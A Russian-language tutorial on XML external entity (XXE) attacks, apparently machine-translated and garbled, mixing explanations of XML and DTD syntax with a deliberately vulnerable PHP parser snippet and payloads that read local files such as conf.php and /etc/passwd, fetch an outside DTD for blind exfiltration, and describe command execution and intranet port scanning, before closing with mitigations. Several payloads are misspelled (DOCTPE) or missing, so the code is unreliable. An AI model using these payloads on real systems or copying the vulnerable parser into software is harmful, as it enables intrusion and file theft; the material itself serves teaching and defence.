XXE-уязвимость

XXE означает «внедрение внешних сущностей XML», что представляет собой уязвимость внедрения внешних сущностей XML.

Триггерная точка XXE-уязвимость часто является местом, куда можно загрузить XML-файлы.,xml-файлы не фильтруются,Позволяет загружать вредоносные внешние файлы и код.,Вызов произвольного чтения файла,выполнение команды、Сканирование интранет-портов、Атака на интранет-сайт, запуск DoS-атак и другие опасности Чтобы понять уязвимости xxe, вы должны сначала разобраться в базовых знаниях и понять базовый состав XML-документов.

XML — это язык разметки, используемый для маркировки электронных документов с целью их структурирования.,Может использоваться для маркировки данных и определения типов данных.,это метод, который позволяет пользователям контролировать свои собственныеязык разметкиисходный язык, на котором дано определение。XMLВ структуру документа входятXML-декларация、Определение типа документа DTD (необязательно)、документэлемент

Введение и использование XML

XML предназначен для передачи и хранения данных. XML-документы образуют древовидную структуру, начиная с «корня» и заканчивая «листьями».

XML позволяет авторам определять свои собственные теги и собственную структуру документа.

Строительные блоки XML-документов

Все документы XML (а также документы HTML) состоят из следующих простых строительных блоков:

• элемент
• свойство
• сущность
• PCDATA
• CDATA

Ниже приводится краткое описание каждого строительного блока.

1. Элементы

Элементы являются основными строительными блоками документов XML и HTML. Элементы могут содержать текст, другие элементы или быть пустыми. Пример:

<body>body text in between</body>
<message>some message in between</message>

Примеры пустых HTML-элементов: «hr», «br» и «img».

2. Свойства

Атрибуты предоставляют дополнительную информацию об элементе. Пример:

<img src="computer.gif" />

3. Сущность

Сущности — это переменные, используемые для определения обычного текста. Ссылка на сущность — это ссылка на сущность.

4. PCDATA

PCDATA означает проанализированные символьные данные. PCDATA — это текст, который будет анализироваться парсером. Эти тексты будут проверены парсером на наличие сущностей и тегов.

5. CDATA

CDATA означает символьные данные. CDATA — это текст, который не будет анализироваться синтаксическим анализатором.

Правила синтаксиса XML

• Все элементы XML должны иметь закрывающий тег.
• Теги XML чувствительны к регистру
• XML должен быть правильно вложен.
• Значение XMLсвойства должно быть указано в кавычках.
• сущность Цитировать
• В XML пробелы сохраняются.

Введение функции

file_get_cintentВведение функции

Функция file_get_content() считывает весь файл в строку.

Введение в php://inpput

php://input — это поток, доступный только для чтения, который обеспечивает доступ к запрошенным необработанным данным.

В сочетании с file_get_contents(php://input) данные, отправленные POST, можно прочитать.

simplexml_load_stringВведение функции

Функция simplexml_load_string в php преобразует строку формата xml в соответствующий SimpleXMLElement.

Функция вывода эха XML-инъекции

Вы можете использовать print_r() в php для отображения содержимого, которое вы хотите вывести.

существоватьXXE-уязвимостькод

<?php

$xml= file_get_contents(php://input);

$data = simplexml_load_string($xml);

echo"<pre>";

print_r($data);//Закомментируйте этот оператор, и эха не будет.

?>

Тест POC на php

file:///path/file.txt

http://url/file.ext

php://filter/read=convert.base64-encode/resource=conf.php

DTD (Определение типа документа)

Роль DTD (определения типа документа) заключается в определении допустимых строительных блоков XML-документа.

DTD может быть объявлен внутри документа XML или на него можно ссылаться извне.

1. Внутреннее заявление: например: <!DOCTYOE test any>весь Пример:

<?xml version="1.0"?>
<!DOCTYPE note [
  <!ELEMENT note (to,from,heading,body)>
  <!ELEMENT to      (#PCDATA)>
  <!ELEMENT from    (#PCDATA)>
  <!ELEMENT heading (#PCDATA)>
  <!ELEMENT body    (#PCDATA)>
]>
<note>
  <to>George</to>
  <from>John</from>
  <heading>Reminder</heading>
  <body>Don't forget the meeting!</body>
</note>

2,внешняя декларация（ЦитироватьвнешнийDTD）：ex:<!DOCTYPE test SYSTEM 'http://www.test.com/evil.dtd'>весь Пример:

<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>

Содержимое note.dtd:

<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>

сущность DTD

DTD сущности — это переменная, используемая для определения ярлыка для ссылки на обычный текст или специальные символы, и может быть объявлена ​​внутри или на нее можно ссылаться извне.

Сущности делятся на общие сущности и сущности-параметры. 1. Синтаксис объявления общих сущностей: Способ обращения к сущностям:

&сущностьимя；

2. Сущности параметров можно использовать только в DTD. Формат объявления сущностей параметров:

Метод обращения к сущностям: % имя сущности;

1. Объявление внутренней сущности: ex:<!ENTITY eviltest "eviltest">весь Пример:

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">
]>

<test>&writer;&copyright;</test>

2,внешнийсущностьзаявление:весь Пример:

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
<!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
]>
<author>&writer;&copyright;</author>

Какие протоколы поддерживаются?

Различные программы поддерживают следующие протоколы: ![](

Среди них PHP поддерживает больше протоколов, но требует определенной расширенной поддержки.

эксплуатировать

Есть отголосок использования XXE-уязвимости.

Чтение файла документа

<?xml version="1.0" encoding="utf-8"?>

<!DOCTPE  ANY[

<!ENTITY xxe SYSTEM "file:///c:/post.txt">]>

<name>&xxe;</name>

Чтение php-файла

<?xml version="1.0" encoding="utf-8"?>

<!DOCTPE  ANY[

<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=conf.php">]>

<name>&xxe;</name>

Принцип теста XXE без эха

ЗапросXML

<DOCTPE foo SYSTEM "http://192.168.3.112/test.dtd">

&e1;

сервердтд

Используйте gedit, чтобы установить содержимое test.dtd на содержимое файла, показанного на рисунке ниже.

Используйте Wireshark для захвата http и просмотра информации

Атаки и вред XXE (внешний объект XML)

XXE Опасность 1: Чтение произвольных файлов

Этот СЛУЧАЙ предназначен для чтения /etc/passwd. Некоторые библиотеки синтаксического анализа XML поддерживают перечисление каталогов. Злоумышленники могут получить учетную запись и пароль, перечислив каталоги и прочитав файлы, а затем продолжить атаку, например, после чтения tomcat-users.xml. учетную запись и пароль, они могут войти в диспетчер Tomcat.

Может отправлять данные на удаленный сервер

Содержимое удаленного файла evil.dtd следующее:

После запуска атаки XXE сервер отправит содержимое файла на сайт злоумышленника.

XXE Опасность 2: выполнение системных команд

Этот CASE предназначен для выполнения системных команд в среде PHP, где установлено ожидаемое расширение. Другие протоколы также могут выполнять системные команды.

XXE Опасность 3: Обнаружение портов интрасети

Этот CASE обнаруживает порты 80 и 81 из 192.168.1.1. Из возвращенного сообщения «Соединение отклонено» мы можем узнать, что порт 81 закрыт, а порт 80 открыт.

XXE Опасность 4: Атака на интранет-сайты

Этот CASE атакует веб-сайт struts2 в интрасети и удаленно выполняет системные команды.

Как защититься от атак xxe

1. Используйте метод, предусмотренный языком разработки, для отключения внешних объектов.

PHP：
libxml_disable_entity_loader(true);

JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

Python：
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

2. Фильтрация XML-данных, отправленных пользователями.

ключевые слова：<!DOCTYPEи<!ENTITY,или,СИСТЕМА и ОБЩЕСТВЕННОСТЬ